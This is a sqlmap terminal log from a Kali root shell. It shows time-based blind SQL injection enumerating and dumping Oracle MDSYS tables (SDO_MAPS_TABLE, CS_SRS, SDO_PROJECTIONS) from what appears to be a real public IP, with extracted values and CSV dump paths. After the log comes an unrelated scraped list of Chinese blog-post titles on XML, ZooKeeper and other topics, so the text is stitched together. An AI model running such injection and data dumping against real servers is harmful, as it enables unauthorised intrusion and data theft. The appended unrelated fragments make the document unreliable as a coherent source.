[11:45:47] [INFO] the SQL query used returns 4 entries
[11:45:47] [INFO] resumed: "SDO_OWNER","VARCHAR2"
[11:45:47] [INFO] resumed: "NAME","VARCHAR2"
[11:45:47] [INFO] resumed: "DESCRIPTION","VARCHAR2"
[11:45:47] [INFO] resumed: "DEFINITION","CLOB"
[11:45:47] [INFO] fetching entries for table 'SDO_MAPS_TABLE' in database 'MDSYS'
[11:45:47] [INFO] fetching number of entries for table 'SDO_MAPS_TABLE' in database 'MDSYS'
[11:45:47] [INFO] resumed: 0
[11:45:47] [WARNING] table 'SDO_MAPS_TABLE' in database 'MDSYS' appears to be empty
Database: MDSYS
Table: SDO_MAPS_TABLE
[0 entries]
+------+-----------+------------+-------------+
| NAME | SDO_OWNER | DEFINITION | DESCRIPTION |
+------+-----------+------------+-------------+
+------+-----------+------------+-------------+
[11:45:47] [INFO] table 'MDSYS.SDO_MAPS_TABLE' dumped to CSV file '/root/.sqlmap/output/202.201.33.73/dump/MDSYS/SDO_MAPS_TABLE.csv'
[11:45:47] [INFO] fetching columns for table 'CS_SRS' in database 'MDSYS'
[11:45:47] [INFO] the SQL query used returns 6 entries
[11:45:47] [INFO] resumed: "CS_NAME","VARCHAR2"
[11:45:47] [INFO] resumed: "SRID","NUMBER"
[11:45:47] [INFO] resumed: "AUTH_SRID","NUMBER"
[11:45:47] [INFO] resumed: "AUTH_NAME","VARCHAR2"
[11:45:47] [INFO] resumed: "WKTEXT","VARCHAR2"
[11:45:47] [INFO] resumed: "CS_BOUNDS","SDO_GEOMETRY"
[11:45:47] [INFO] fetching entries for table 'CS_SRS' in database 'MDSYS'
[11:45:47] [INFO] the SQL query used returns 1000 entries
you provided a HTTP Cookie header value. The target URL provided its own cookies within the HTTP Set-Cookie header which intersect with yours. Do you want to merge them in further requests? [Y/n] y
^C
[11:48:11] [WARNING] user aborted during enumeration. sqlmap will display partial output
[11:48:11] [INFO] fetching number of entries for table 'CS_SRS' in database 'MDSYS'
[11:48:11] [WARNING] (case) time-based comparison requires larger statistical model, please wait.............................. (done)
[11:48:21] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] n
1000
[11:49:19] [WARNING] (case) time-based comparison requires larger statistical model, please wait.............................. (done)
University of Arizona
[11:55:51] [WARNING] (case) time-based comparison requires larger statistical model, please wait.............................. (done)
20
[11:56:40] [ERROR] invalid character detected. retrying..
0
[11:57:00] [ERROR] invalid character detected. retrying..
0001
[11:57:35] [WARNING] (case) time-based comparison requires larger statistical model, please wait.............................. (done)
Martian Longitude/Latitude
[12:05:35] [WARNING] (case) time-based comparison requires larger statistical model, please wait.............................. (done)
2000001
[12:06:52] [WARNING] (case) time-based comparison requires larger statistical model, please wait.............................. (done)
[12:07:16] [ERROR] invalid character detected. retrying..
GEOGCS [ "Mar
[12:11:45] [ERROR] invalid character detected. retrying..
tian Lon^C
[12:14:39] [WARNING] Ctrl+C detected in dumping phase
Database: MDSYS
Table: CS_SRS
[0 entries]
+---------+-----------+--------+----------------------------+-----------------------+-----------+
| SRID | AUTH_SRID | WKTEXT | CS_NAME | AUTH_NAME | CS_BOUNDS |
+---------+-----------+--------+----------------------------+-----------------------+-----------+
+---------+-----------+--------+----------------------------+-----------------------+-----------+
[12:14:39] [INFO] table 'MDSYS.CS_SRS' dumped to CSV file '/root/.sqlmap/output/202.201.33.73/dump/MDSYS/CS_SRS.csv'
[12:14:39] [INFO] fetching columns for table 'SDO_PROJECTIONS' in database 'MDSYS'
[12:14:40] [INFO] the SQL query used returns 1 entries
[12:14:40] [INFO] fetching entries for table 'SDO_PROJECTIONS' in database 'MDSYS'
[12:14:40] [INFO] fetching number of entries for table 'SDO_PROJECTIONS' in database 'MDSYS'
[12:14:40] [WARNING] (case) time-based comparison requires larger statistical model, please wait...^X..........^C....^C
[12:14:46] [ERROR] user aborted
[*] shutting down at 12:14:46
root@kali-yaming:~#
sqlmap实例文档的更多相关文章
- XML实例文档
from: http://www.w3school.com.cn/xpath/xpath_examples.asp XML实例文档 我们将在下面的例子中使用这个 XML 文档: "books ...
- ZooKeeper----Java实例文档
**************************************************************************************************** ...
- RSS实例文档
<?xml version="1.0" encoding="ISO-8859-1" ?> <rss version="2.0&quo ...
- Visual FoxPro 6.0~9.0解决方案和实例文档和CD写入原件下载
自从微软宣布开发冻结Visual FoxPro之后,这样的图书出版已经成为一个问题,但仍有不少VFP小贴士.处处留心此8历史书.在此提供写作的原稿.它看起来非常舒服比扫描版淘宝.下载链接:http:/ ...
- 产品需求文档写作方法(三)用例文档(UML用例图、流程图)
在产品和技术领域里都有UML的技能知识,而对于产品人员的UML则更多的是指用例图,也就是我所称呼的用户流程图.在讲PRD文档写作的第二篇文章里,我提到了用户流程图的制作,实际上用户流程图是我在产品规则 ...
- 浅谈用java解析xml文档(三)
接上一篇,本文介绍使用JDOM解析xml文档, 首先我们还是应该知道JDOM从何而来,是Breet Mclaughlin和Jason Hunter两大Java高手的创作成果,2000年初, JDOM作 ...
- Android APP开发需求文档范本
Android APP开发需求文档范本 软件需求文档格式的标准写法 1.引言 1.1 编写目的 • 阐明开发本软件的目的: 1.2 项目背景 • 标识待开发软件产品的名称.代码: • 列出本项目的任 ...
- 通过XmlDocument读写Xml文档参考地址
/// <summary> /// 获取一个报表的参数 http://blog.csdn.net/hdhai9451/article/details/12170069 /// </s ...
- app开发需求文档怎么写
我们在开发app前都会做需求分析,这个app开发需求文档怎么写呢?一般可以从这几点入手:确定APP方案的目标,APP方案的受众分析,APP开发方案功能设计,APP的操作系统说明方案,APP是是否是原生 ...
随机推荐
- 「PKUWC 2018」Minimax
传送门:Here 一道线段树合并好题 如果要维护点$ x$的信息,相当于合并$ x$的两棵子树 对于这题显然有:任何叶子节点的权值都可能出现在其祖先上 因而我们只需要在线段树合并的时候维护概率即可 我 ...
- include指令和<jsp:include>动作标识区别:--不明觉厉 先收藏
<jsp:include> 会通过转发的形式,分别编译被包含的文件,所以不怕重命名:而 include 是将多个被包含的原封不动合并后再一起编译一次,所以不可以重命名. ========= ...
- wx小程序-起航!
手动创建 入口配置文件 app 页面文件新创建一个文件夹 然后在里面分类 1.文件夹名可以不一样,但是里面的wxml,wxss,json 等文件名必须保持一致 2.app.json 入口文件, ...
- Anaconda使用总结
序 Python易用,但用好却不易,其中比较头疼的就是包管理和Python不同版本的问题,特别是当你使用Windows的时候.为了解决这些问题,有不少发行版的Python,比如WinPython.An ...
- MFC修改对话框标题
对话框标题栏内容为静态 直接在对话框属性"常规"的"Caption"中修改. 动态生成对话框标题栏内容 SetWindowText()函数就可以 CString ...
- k64 datasheet学习笔记3---Chip Configuration之Analog
1.前言 本文主要讲述K64芯片配置,关于模拟部分的内容,主要包括:ADC, CMP, DAC, VREF 2.16bit SAR ADC 从上图可以看出ADC主要挂在外设总线0上,由于ADC的输入引 ...
- 3.2. 使用 CPUFREQ 调节器【转】
转自:https://access.redhat.com/documentation/zh-cn/red_hat_enterprise_linux/6/html/power_management_gu ...
- linux服务器ntp客户端配置【转】
转自:https://www.cnblogs.com/kerrycode/archive/2015/08/20/4744804.html 在Linux系统中,为了避免主机时间因为在长时间运行下所导致的 ...
- c++学习day3(字符串_指针)
1.字符串 1)三种形式 用双引号括起来的字符串常量:结尾会有一个'\0'字符,但该字符只占据字节数,不会使字符串长度增加. 存放于字符数组中,以'\0'字符结尾:数组元素个数应至少为字符串长度+1 ...
- VB中的冒号——bug
关于VB中的冒号,给许多人的印象都是:“一行可书写几句语句”.这么说是对的,但是有一种情况是不对的,那就是在条件语句中.这也是做一个VB项目升级的时候遇到,因为这个问题我查了好长时间程序,一直在找VB ...